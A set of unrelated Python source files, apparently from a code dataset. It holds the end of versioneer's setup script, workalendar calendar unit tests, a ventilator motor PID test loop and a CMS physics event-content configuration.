f.write("include versioneer.py\n")
else:
print(" 'versioneer.py' already in MANIFEST.in")
if cfg.versionfile_source not in simple_includes:
print(" appending versionfile_source ('%s') to MANIFEST.in" %
cfg.versionfile_source)
with open(manifest_in, "a") as f:
f.write("include %s\n" % cfg.versionfile_source)
else:
print(" versionfile_source already in MANIFEST.in")
# Make VCS-specific changes. For git, this means creating/changing
# .gitattributes to mark _version.py for export-time keyword
# substitution.
do_vcs_install(manifest_in, cfg.versionfile_source, ipy)
return 0
def scan_setup_py():
"""Validate the contents of setup.py against Versioneer's expectations."""
found = set()
setters = False
errors = 0
with open("setup.py", "r") as f:
for line in f.readlines():
if "import versioneer" in line:
found.add("import")
if "versioneer.get_cmdclass()" in line:
found.add("cmdclass")
if "versioneer.get_version()" in line:
found.add("get_version")
if "versioneer.VCS" in line:
setters = True
if "versioneer.versionfile_source" in line:
setters = True
if len(found) != 3:
print("")
print("Your setup.py appears to be missing some important items")
print("(but I might be wrong). Please make sure it has something")
print("roughly like the following:")
print("")
print(" import versioneer")
print(" setup( version=versioneer.get_version(),")
print(" cmdclass=versioneer.get_cmdclass(), ...)")
print("")
errors += 1
if setters:
print("You should remove lines like 'versioneer.VCS = ' and")
print("'versioneer.versionfile_source = ' . This configuration")
print("now lives in setup.cfg, and should be removed from setup.py")
print("")
errors += 1
return errors
if __name__ == "__main__":
cmd = sys.argv[1]
if cmd == "setup":
errors = do_setup()
errors += scan_setup_py()
if errors:
sys.exit(1)
|
py | 7dfa1d6607b3edcebc2001b920940783efdd0057 | from datetime import date
from datetime import datetime
from workalendar.tests import GenericCalendarTest
from workalendar.core import MON, TUE, THU, FRI
from workalendar.core import Calendar, LunarCalendar, WesternCalendar
from workalendar.core import IslamicMixin, JalaliMixin, ChristianMixin
from workalendar.core import EphemMixin
class CalendarTest(GenericCalendarTest):
def test_private_variables(self):
self.assertTrue(hasattr(self.cal, '_holidays'))
private_holidays = self.cal._holidays
self.assertTrue(isinstance(private_holidays, dict))
self.cal.holidays(2011)
self.cal.holidays(2012)
private_holidays = self.cal._holidays
self.assertTrue(isinstance(private_holidays, dict))
self.assertIn(2011, self.cal._holidays)
self.assertIn(2012, self.cal._holidays)
def test_year(self):
holidays = self.cal.holidays()
self.assertTrue(isinstance(holidays, (tuple, list)))
self.assertEquals(self.cal._holidays[self.year], holidays)
def test_another_year(self):
holidays = self.cal.holidays(2011)
self.assertTrue(isinstance(holidays, (tuple, list)))
self.assertEquals(self.cal._holidays[2011], holidays)
def test_is_working_day(self):
self.assertRaises(
NotImplementedError,
self.cal.is_working_day, date(2012, 1, 1))
def test_nth_weekday(self):
# first monday in january 2013
self.assertEquals(
Calendar.get_nth_weekday_in_month(2013, 1, MON),
date(2013, 1, 7)
)
# second monday in january 2013
self.assertEquals(
Calendar.get_nth_weekday_in_month(2013, 1, MON, 2),
date(2013, 1, 14)
)
# let's test the limits
# Jan 1st is a TUE
self.assertEquals(
Calendar.get_nth_weekday_in_month(2013, 1, TUE),
date(2013, 1, 1)
)
# There's no 6th MONday
self.assertEquals(
Calendar.get_nth_weekday_in_month(2013, 1, MON, 6),
None
)
def test_nth_weekday_start(self):
# first thursday after 18th april
start = date(2013, 4, 18)
self.assertEquals(
Calendar.get_nth_weekday_in_month(2013, 4, THU, start=start),
date(2013, 4, 18)
)
# first friday after 18th april
start = date(2013, 4, 18)
self.assertEquals(
Calendar.get_nth_weekday_in_month(2013, 4, FRI, start=start),
date(2013, 4, 19)
)
def test_last_weekday(self):
# last monday in january 2013
self.assertEquals(
Calendar.get_last_weekday_in_month(2013, 1, MON),
date(2013, 1, 28)
)
# last thursday
self.assertEquals(
Calendar.get_last_weekday_in_month(2013, 1, THU),
date(2013, 1, 31)
)
class LunarCalendarTest(GenericCalendarTest):
cal_class = LunarCalendar
def test_new_year(self):
self.assertEquals(
self.cal.lunar(2014, 1, 1),
date(2014, 1, 31)
)
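# MockCalendar below is a deliberately minimal Calendar subclass for the tests
# that follow: it declares only Christmas and New Year as holidays and reports
# no weekend days at all, so add_working_days() can be exercised without
# weekend effects.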
class MockCalendar(Calendar):
def holidays(self, year=None):
return tuple((
(date(year, 12, 25), 'Christmas'),
(date(year, 1, 1), 'New year'),
))
def get_weekend_days(self):
return [] # no week-end, yes, it's sad
class MockCalendarTest(GenericCalendarTest):
cal_class = MockCalendar
def test_holidays_set(self):
self.assertIn(
date(self.year, 12, 25), self.cal.holidays_set(self.year))
self.assertIn(
date(self.year, 1, 1), self.cal.holidays_set(self.year))
def test_sorted_dates(self):
holidays = list(self.cal.holidays(self.year))
day, label = holidays.pop()
for next_day, label in holidays:
self.assertTrue(day <= next_day)
day = next_day
def test_add_workingdays_simple(self):
# day is out of non-working-day
self.assertEquals(
self.cal.add_working_days(date(self.year, 12, 20), 0),
date(self.year, 12, 20)
)
self.assertEquals(
self.cal.add_working_days(date(self.year, 12, 20), 1),
date(self.year, 12, 21)
)
def test_add_workingdays_on_holiday(self):
# day is in holidays
self.assertEquals(
self.cal.add_working_days(date(self.year, 12, 25), 0),
date(self.year, 12, 25)
)
self.assertEquals(
self.cal.add_working_days(date(self.year, 12, 24), 1),
date(self.year, 12, 26)
)
self.assertEquals(
self.cal.add_working_days(date(self.year, 12, 24), 2),
date(self.year, 12, 27)
)
def test_add_workingdays_span(self):
day = date(self.year, 12, 20)
# since this calendar has no weekends, we'll just have a 2-day-shift
self.assertEquals(
self.cal.add_working_days(day, 20),
date(self.year + 1, 1, 11)
)
def test_add_working_days_exceptions(self):
day = date(self.year, 12, 20)
christmas = date(self.year, 12, 25)
boxing = date(self.year, 12, 26)
# exceptional workday
self.assertEquals(
self.cal.add_working_days(day, 20, extra_working_days=[christmas]),
date(self.year + 1, 1, 10)
)
# exceptional holiday + exceptional workday
self.assertEquals(
self.cal.add_working_days(day, 20,
extra_working_days=[christmas],
extra_holidays=[boxing]),
date(self.year + 1, 1, 11)
)
def test_add_exceptions(self):
december_20th = date(self.year, 12, 20)
christmas = date(self.year, 12, 25)
# target_working_day *is* a working day
target_working_day = self.cal.add_working_days(december_20th, 1)
# Add extra working days
extra_working_days = [christmas]
# add extra holidays
extra_holidays = [target_working_day]
self.assertFalse(self.cal.is_working_day(christmas))
self.assertTrue(
self.cal.is_working_day(christmas,
extra_working_days=extra_working_days))
self.assertTrue(self.cal.is_working_day(target_working_day))
self.assertFalse(
self.cal.is_working_day(target_working_day,
extra_holidays=extra_holidays))
# test is_holiday
self.assertTrue(self.cal.is_holiday(christmas))
def test_datetime(self):
self.assertFalse(
self.cal.is_working_day(datetime(2014, 1, 1)))
class IslamicMixinTest(GenericCalendarTest):
cal_class = IslamicMixin
def test_year_conversion(self):
days = self.cal.converted(2013)
self.assertEquals(len(days), 365)
class JalaliMixinTest(GenericCalendarTest):
cal_class = JalaliMixin
def test_year_conversion(self):
days = self.cal.converted(2013)
self.assertEquals(len(days), 365)
class EphemMixinTest(GenericCalendarTest):
cal_class = EphemMixin
def test_calculate_some_equinoxes(self):
self.assertEquals(
self.cal.calculate_equinoxes(2010),
(date(2010, 3, 20), date(2010, 9, 23))
)
self.assertEquals(
self.cal.calculate_equinoxes(2010, 'Asia/Taipei'),
(date(2010, 3, 21), date(2010, 9, 23))
)
self.assertEquals(
self.cal.calculate_equinoxes(2013),
(date(2013, 3, 20), date(2013, 9, 22))
)
self.assertEquals(
self.cal.calculate_equinoxes(2014),
(date(2014, 3, 20), date(2014, 9, 23))
)
self.assertEquals(
self.cal.calculate_equinoxes(2020),
(date(2020, 3, 20), date(2020, 9, 22))
)
def test_qingming_festivals(self):
self.assertEquals(
self.cal.solar_term(2001, 15),
date(2001, 4, 4)
)
self.assertEquals(
self.cal.solar_term(2001, 15, 'Asia/Taipei'),
date(2001, 4, 5)
)
self.assertEquals(
self.cal.solar_term(2011, 15),
date(2011, 4, 5)
)
self.assertEquals(
self.cal.solar_term(2014, 15),
date(2014, 4, 4)
)
class MockChristianCalendar(WesternCalendar, ChristianMixin):
pass
class MockChristianCalendarTest(GenericCalendarTest):
cal_class = MockChristianCalendar
def test_year_2014(self):
holidays = self.cal.holidays_set(2014)
self.assertNotIn(date(2014, 1, 6), holidays) # Epiphany
self.assertNotIn(date(2014, 3, 3), holidays) # Clean Monday
self.assertNotIn(date(2014, 3, 5), holidays) # Ash Wednesday
self.assertNotIn(date(2014, 3, 25), holidays) # Annunciation
self.assertNotIn(date(2014, 4, 17), holidays) # Holy Thursday
self.assertNotIn(date(2014, 4, 18), holidays) # Good Friday
self.assertNotIn(date(2014, 4, 19), holidays) # Easter sat
self.assertNotIn(date(2014, 4, 20), holidays) # Easter Sun
self.assertNotIn(date(2014, 4, 21), holidays) # Easter Mon
self.assertNotIn(date(2014, 5, 29), holidays) # Ascension
self.assertNotIn(date(2014, 6, 8), holidays) # Whit Sunday
self.assertNotIn(date(2014, 6, 9), holidays) # Whit Monday
self.assertNotIn(date(2014, 6, 19), holidays) # Corp. Christi
self.assertNotIn(date(2014, 8, 15), holidays) # Assumption
self.assertNotIn(date(2014, 11, 1), holidays) # All Saints
self.assertNotIn(date(2014, 12, 8), holidays) # Imm. Conc.
self.assertNotIn(date(2014, 12, 24), holidays) # Xmas Eve
self.assertNotIn(date(2014, 12, 26), holidays) # Boxing Day
# The only Christian day that is a holiday for every calendar
self.assertIn(date(2014, 12, 25), holidays) # XMas
# Only 2 days: Jan 1st and Christmas
self.assertEquals(len(holidays), 2)
|
py | 7dfa1e52620b52ed450794077116af9e1ba29019 | #!/usr/bin/python
#
# TicDevice and PID test
# VentCU - An open source ventilator
#
# (c) VentCU, 2020. All Rights Reserved.
#
from time import sleep
from actuators.pid_controller import PID
from actuators.tic_usb import *
import pigpio
from sensors.rotary_encoder import RotaryEncoder
# define some global vars
encoder_value = 0
# create a motor controller object
ticdev = TicDevice()
ticdev.open(vendor=0x1ffb, product_id=0x00CB)
# create the encoder object
pi = pigpio.pi()
encoder = RotaryEncoder(pi, 18, 16)
# create the PID controller
pid = PID(P=100, D=12.0, I=0)
encoder_u_limit = 400
encoder_l_limit = 0
pid.setpoint = encoder_u_limit
if __name__ == "__main__":
while True:
encoder_value = encoder.value()
pid.update(encoder_value)
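        # Scale the PID output into a Tic target velocity. The 15000.0 gain and
        # the 100000 fallback (used when the output exceeds 1e6) appear to be
        # rig-specific tuning values rather than constants from the TicDevice
        # API.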
value = pid.output * 15000.0 if pid.output < 1000000 else 100000
ticdev.get_variables()
motor_pose = ticdev.variables['current_position']
ticdev.set_target_velocity(int(value))
print("{}, {}, {}".format(int(value), encoder_value, motor_pose))
if encoder_value == encoder_u_limit and value == 0:
# print("updating setpoint")
sleep(1.5)
pid.setpoint = encoder_l_limit
elif encoder_value == encoder_l_limit and value == 0:
# print("updating setpoint")
sleep(1.5)
pid.setpoint = encoder_u_limit
ticdev.halt_and_hold()
encoder.cancel()
pi.stop()
exit()
|
py | 7dfa1fc2efe9a4194c19a210b71d2f742dc286e3 | import FWCore.ParameterSet.Config as cms
#
# Event Content definition
#
# Data Tiers defined:
#
# LHE:
# include pure LHE production
#
# RAW , RECO, AOD:
# include reconstruction content
#
# RAWSIM, RECOSIM, AODSIM:
# include reconstruction and simulation
#
# GENRAW
# slimmed-down version of RAWSIM for small transient disk size during MC production, contains Gen+Rawdata
#
# PREMIX
# contains special Digi collection(s) for pre-mixing minbias events for pileup simulation
# Raw2Digi step is done on this file.
#
# PREMIXRAW
# extension of RAWSIM for output of second stage of PreMixing using the DataMixer.
#
# RAWDEBUG(RAWSIM+ALL_SIM_INFO), RAWDEBUGHLT(RAWDEBUG+HLTDEBUG)
#
# RAWSIMHLT (RAWSIM + HLTDEBUG)
#
# RAWRECOSIMHLT, RAWRECODEBUGHLT
#
# FEVT (RAW+RECO), FEVTSIM (RAWSIM+RECOSIM), FEVTDEBUG (FEVTSIM+ALL_SIM_INFO), FEVTDEBUGHLT (FEVTDEBUG+HLTDEBUG)
#
# $Id: EventContent_cff.py,v 1.54 2013/05/01 15:44:29 mikeh Exp $
#
#
#
#
# Reconstruction Systems
#
#
from RecoLocalTracker.Configuration.RecoLocalTracker_EventContent_cff import *
from RecoLocalMuon.Configuration.RecoLocalMuon_EventContent_cff import *
from RecoLocalCalo.Configuration.RecoLocalCalo_EventContent_cff import *
from RecoEcal.Configuration.RecoEcal_EventContent_cff import *
from TrackingTools.Configuration.TrackingTools_EventContent_cff import *
from RecoTracker.Configuration.RecoTracker_EventContent_cff import *
from RecoJets.Configuration.RecoJets_EventContent_cff import *
from RecoMET.Configuration.RecoMET_EventContent_cff import *
from RecoMuon.Configuration.RecoMuon_EventContent_cff import *
from RecoBTau.Configuration.RecoBTau_EventContent_cff import *
from RecoBTag.Configuration.RecoBTag_EventContent_cff import *
from RecoTauTag.Configuration.RecoTauTag_EventContent_cff import *
from RecoVertex.Configuration.RecoVertex_EventContent_cff import *
from RecoPixelVertexing.Configuration.RecoPixelVertexing_EventContent_cff import *
from RecoEgamma.Configuration.RecoEgamma_EventContent_cff import *
from RecoParticleFlow.Configuration.RecoParticleFlow_EventContent_cff import *
from L1Trigger.Configuration.L1Trigger_EventContent_cff import *
from RecoVertex.BeamSpotProducer.BeamSpot_EventContent_cff import *
from CommonTools.ParticleFlow.EITopPAG_EventContent_cff import EITopPAGEventContent
from RecoPPS.Configuration.RecoCTPPS_EventContent_cff import *
# raw2digi that are already the final RECO/AOD products
from EventFilter.ScalersRawToDigi.Scalers_EventContent_cff import *
from EventFilter.OnlineMetaDataRawToDigi.OnlineMetaData_EventContent_cff import *
from EventFilter.Utilities.Tcds_EventContent_cff import *
#DigiToRaw content
from EventFilter.Configuration.DigiToRaw_EventContent_cff import *
#
#
# Simulation Systems
#
#
from GeneratorInterface.Configuration.GeneratorInterface_EventContent_cff import *
from SimG4Core.Configuration.SimG4Core_EventContent_cff import *
from SimTracker.Configuration.SimTracker_EventContent_cff import *
from SimMuon.Configuration.SimMuon_EventContent_cff import *
from SimCalorimetry.Configuration.SimCalorimetry_EventContent_cff import *
from SimFastTiming.Configuration.SimFastTiming_EventContent_cff import *
from SimGeneral.Configuration.SimGeneral_EventContent_cff import *
from IOMC.RandomEngine.IOMC_EventContent_cff import *
#
#
# HLT
#
#
from HLTrigger.Configuration.HLTrigger_EventContent_cff import *
#
#
# DQM
#
#
from DQMOffline.Configuration.DQMOffline_EventContent_cff import *
#
#
# NANOAOD
#
#
from PhysicsTools.NanoAOD.NanoAODEDMEventContent_cff import *
#
#
# FastSim
#
#
from FastSimulation.Configuration.EventContent_cff import FASTPUEventContent
import FastSimulation.Configuration.EventContent_cff as fastSimEC
from Configuration.Eras.Modifier_fastSim_cff import fastSim
fastSim.toModify(RecoLocalTrackerRECO, outputCommands = fastSimEC.RecoLocalTracker.outputCommands)
fastSim.toModify(RecoLocalTrackerFEVT, outputCommands = fastSimEC.RecoLocalTracker.outputCommands)
fastSim.toReplaceWith(SimG4CoreRAW, fastSimEC.SimRAW)
fastSim.toReplaceWith(SimG4CoreRECO, fastSimEC.SimRECO)
#
#
# Top level additional keep statements
#
#
CommonEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('keep *_logErrorHarvester_*_*')
)
#
#
# LHE Data Tier definition
#
#
LHEEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RAW Data Tier definition
#
#
RAWEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *',
'keep FEDRawDataCollection_rawDataCollector_*_*',
'keep FEDRawDataCollection_source_*_*'),
splitLevel = cms.untracked.int32(0),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
#
#
# RECO Data Tier definition
#
#
RECOEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RAWRECO Data Tier definition
#
#
RAWRECOEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# AOD Data Tier definition
#
#
AODEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(30*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
#
#
# RAWAOD Data Tier definition
#
#
RAWAODEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(30*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4)
)
#
#
# RAWSIM Data Tier definition
# ===========================
#
# Here, we sacrifice memory and CPU time to decrease the on-disk size as
# much as possible. Given the current per-event GEN-SIM and DIGI-RECO times,
# the extra CPU time for LZMA compression works out to be ~1%. The GEN-SIM
# use case of reading a minbias event for `classic pileup` has a similar CPU
# impact.
# The memory increase appears to be closer to 50MB - but that should be
# acceptable as the introduction of multithreaded processing has bought us some
# breathing room.
#
RAWSIMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
eventAutoFlushCompressedSize=cms.untracked.int32(20*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(1)
)
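# Illustrative sketch (not part of this configuration): a job would typically
# consume one of these PSets from an output module's outputCommands, e.g.
#
#   RAWSIMoutput = cms.OutputModule("PoolOutputModule",
#       fileName = cms.untracked.string("file:rawsim.root"),  # hypothetical name
#       outputCommands = RAWSIMEventContent.outputCommands
#   )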
#
#
# RAWSIMHLT Data Tier definition
#
#
RAWSIMHLTEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RAWRECOSIMHLT Data Tier definition
#
#
RAWRECOSIMHLTEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RAWRECODEBUGHLT Data Tier definition
#
#
RAWRECODEBUGHLTEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RECOSIM Data Tier definition
#
#
RECOSIMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# GENRAW Data Tier definition
#
#
GENRAWEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# AODSIM Data Tier definition
#
#
AODSIMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
eventAutoFlushCompressedSize=cms.untracked.int32(30*1024*1024),
compressionAlgorithm=cms.untracked.string("LZMA"),
compressionLevel=cms.untracked.int32(4),
)
#
#
# FEVT Data Tier definition
#
#
FEVTEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
FEVTHLTALLEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# FEVTSIM Data Tier definition
#
#
FEVTSIMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RAWDEBUG Data Tier definition
#
#
RAWDEBUGEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RAWDEBUGHLT Data Tier definition
#
#
RAWDEBUGHLTEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# FEVTDEBUG Data Tier definition
#
#
FEVTDEBUGEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# FEVTDEBUGHLT Data Tier definition
#
#
FEVTDEBUGHLTEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
# RECOSIMDEBUG Data Tier definition
#
#
RECODEBUGEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
## HLTDEBUG tier definition
#
HLTDEBUGEventContent = cms.PSet(
#outputCommands = cms.untracked.vstring('drop *',
# 'keep *_hlt*_*_*')
outputCommands = cms.untracked.vstring('drop *',
'keep *_logErrorHarvester_*_*'),
splitLevel = cms.untracked.int32(0),
)
#
#
## DQM event content
#
#
DQMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *',
'keep *_MEtoEDMConverter_*_*'),
splitLevel = cms.untracked.int32(0)
)
#Special Event Content for MixingModule and DataMixer
DATAMIXEREventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *',
'keep CSCDetIdCSCALCTDigiMuonDigiCollection_muonCSCDigis_MuonCSCALCTDigi_*',
'keep CSCDetIdCSCCLCTDigiMuonDigiCollection_muonCSCDigis_MuonCSCCLCTDigi_*',
'keep CSCDetIdCSCComparatorDigiMuonDigiCollection_muonCSCDigis_MuonCSCComparatorDigi_*',
'keep CSCDetIdCSCCorrelatedLCTDigiMuonDigiCollection_csctfDigis_*_*',
'keep CSCDetIdCSCCorrelatedLCTDigiMuonDigiCollection_muonCSCDigis_MuonCSCCorrelatedLCTDigi_*',
'keep CSCDetIdCSCRPCDigiMuonDigiCollection_muonCSCDigis_MuonCSCRPCDigi_*',
'keep CSCDetIdCSCStripDigiMuonDigiCollection_muonCSCDigis_MuonCSCStripDigi_*',
'keep CSCDetIdCSCWireDigiMuonDigiCollection_muonCSCDigis_MuonCSCWireDigi_*',
'keep DTLayerIdDTDigiMuonDigiCollection_muonDTDigis_*_*',
'keep PixelDigiedmDetSetVector_siPixelDigis_*_*',
'keep SiStripDigiedmDetSetVector_siStripDigis_*_*',
'keep RPCDetIdRPCDigiMuonDigiCollection_muonRPCDigis_*_*',
'keep HBHEDataFramesSorted_hcalDigis_*_*',
'keep HFDataFramesSorted_hcalDigis_*_*',
'keep HODataFramesSorted_hcalDigis_*_*',
'keep QIE10DataFrameHcalDataFrameContainer_hcalDigis_*_*',
'keep QIE11DataFrameHcalDataFrameContainer_hcalDigis_*_*',
'keep ZDCDataFramesSorted_hcalDigis_*_*',
'keep CastorDataFramesSorted_castorDigis_*_*',
'keep EBDigiCollection_ecalDigis_*_*',
'keep EEDigiCollection_ecalDigis_*_*',
'keep ESDigiCollection_ecalPreshowerDigis_*_*'),
splitLevel = cms.untracked.int32(0),
)
PREMIXEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
MIXINGMODULEEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *',
'keep *_cfWriter_*_*'),
splitLevel = cms.untracked.int32(0),
)
# PREMIXRAW Data Tier definition
#
#
PREMIXRAWEventContent = cms.PSet(
outputCommands = cms.untracked.vstring('drop *'),
splitLevel = cms.untracked.int32(0),
)
#
#
## RAW repacked event content definition
#
#
REPACKRAWEventContent = cms.PSet(
outputCommands = cms.untracked.vstring(
'drop *',
'drop FEDRawDataCollection_*_*_*',
'keep FEDRawDataCollection_rawDataRepacker_*_*',
'keep FEDRawDataCollection_virginRawDataRepacker_*_*',
'keep FEDRawDataCollection_rawDataReducedFormat_*_*'),
splitLevel = cms.untracked.int32(0),
)
REPACKRAWSIMEventContent = cms.PSet(
outputCommands = cms.untracked.vstring(),
splitLevel = cms.untracked.int32(0),
)
LHEEventContent.outputCommands.extend(GeneratorInterfaceLHE.outputCommands)
HLTDEBUGEventContent.outputCommands.extend(HLTDebugFEVT.outputCommands)
RAWEventContent.outputCommands.extend(L1TriggerRAW.outputCommands)
RAWEventContent.outputCommands.extend(HLTriggerRAW.outputCommands)
REPACKRAWEventContent.outputCommands.extend(L1TriggerRAW.outputCommands)
REPACKRAWEventContent.outputCommands.extend(HLTriggerRAW.outputCommands)
RECOEventContent.outputCommands.extend(RecoLocalTrackerRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoLocalMuonRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoLocalCaloRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoEcalRECO.outputCommands)
RECOEventContent.outputCommands.extend(TrackingToolsRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoTrackerRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoJetsRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoMETRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoMuonRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoBTauRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoBTagRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoTauTagRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoVertexRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoEgammaRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoPixelVertexingRECO.outputCommands)
RECOEventContent.outputCommands.extend(RecoParticleFlowRECO.outputCommands)
RECOEventContent.outputCommands.extend(BeamSpotRECO.outputCommands)
RECOEventContent.outputCommands.extend(L1TriggerRECO.outputCommands)
RECOEventContent.outputCommands.extend(HLTriggerRECO.outputCommands)
RECOEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands)
RECOEventContent.outputCommands.extend(EvtScalersRECO.outputCommands)
RECOEventContent.outputCommands.extend(OnlineMetaDataContent.outputCommands)
RECOEventContent.outputCommands.extend(TcdsEventContent.outputCommands)
RECOEventContent.outputCommands.extend(CommonEventContent.outputCommands)
RECOEventContent.outputCommands.extend(EITopPAGEventContent.outputCommands)
from Configuration.Eras.Modifier_ctpps_2016_cff import ctpps_2016
ctpps_2016.toModify(RECOEventContent, outputCommands = RECOEventContent.outputCommands + RecoCTPPSRECO.outputCommands)
RAWRECOEventContent.outputCommands.extend(RECOEventContent.outputCommands)
RAWRECOEventContent.outputCommands.extend(cms.untracked.vstring(
'keep FEDRawDataCollection_rawDataCollector_*_*',
'keep FEDRawDataCollection_source_*_*'
))
AODEventContent.outputCommands.extend(RecoLocalTrackerAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoLocalMuonAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoLocalCaloAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoEcalAOD.outputCommands)
AODEventContent.outputCommands.extend(TrackingToolsAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoTrackerAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoJetsAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoMETAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoMuonAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoBTauAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoBTagAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoTauTagAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoVertexAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoEgammaAOD.outputCommands)
AODEventContent.outputCommands.extend(RecoParticleFlowAOD.outputCommands)
AODEventContent.outputCommands.extend(BeamSpotAOD.outputCommands)
AODEventContent.outputCommands.extend(L1TriggerAOD.outputCommands)
AODEventContent.outputCommands.extend(HLTriggerAOD.outputCommands)
AODEventContent.outputCommands.extend(MEtoEDMConverterAOD.outputCommands)
AODEventContent.outputCommands.extend(EvtScalersAOD.outputCommands)
AODEventContent.outputCommands.extend(OnlineMetaDataContent.outputCommands)
AODEventContent.outputCommands.extend(TcdsEventContent.outputCommands)
AODEventContent.outputCommands.extend(CommonEventContent.outputCommands)
ctpps_2016.toModify(AODEventContent, outputCommands = AODEventContent.outputCommands + RecoCTPPSAOD.outputCommands)
RAWAODEventContent.outputCommands.extend(AODEventContent.outputCommands)
RAWAODEventContent.outputCommands.extend(cms.untracked.vstring(
'keep FEDRawDataCollection_rawDataCollector_*_*',
'keep FEDRawDataCollection_source_*_*'
))
RAWSIMEventContent.outputCommands.extend(RAWEventContent.outputCommands)
RAWSIMEventContent.outputCommands.extend(SimG4CoreRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(SimTrackerRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(SimMuonRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(SimCalorimetryRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(SimFastTimingRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(SimGeneralRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(GeneratorInterfaceRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(RecoGenJetsFEVT.outputCommands)
RAWSIMEventContent.outputCommands.extend(RecoGenMETFEVT.outputCommands)
RAWSIMEventContent.outputCommands.extend(DigiToRawFEVT.outputCommands)
RAWSIMEventContent.outputCommands.extend(MEtoEDMConverterFEVT.outputCommands)
RAWSIMEventContent.outputCommands.extend(IOMCRAW.outputCommands)
RAWSIMEventContent.outputCommands.extend(CommonEventContent.outputCommands)
RAWSIMHLTEventContent.outputCommands.extend(RAWSIMEventContent.outputCommands)
RAWSIMHLTEventContent.outputCommands.extend(HLTDebugRAW.outputCommands)
GENRAWEventContent.outputCommands.extend(RAWEventContent.outputCommands)
GENRAWEventContent.outputCommands.extend(GeneratorInterfaceRECO.outputCommands)
GENRAWEventContent.outputCommands.extend(SimG4CoreRECO.outputCommands)
GENRAWEventContent.outputCommands.extend(SimTrackerRAW.outputCommands)
GENRAWEventContent.outputCommands.extend(SimMuonRECO.outputCommands)
GENRAWEventContent.outputCommands.extend(SimCalorimetryRECO.outputCommands)
GENRAWEventContent.outputCommands.extend(SimFastTimingRECO.outputCommands)
GENRAWEventContent.outputCommands.extend(SimGeneralRECO.outputCommands)
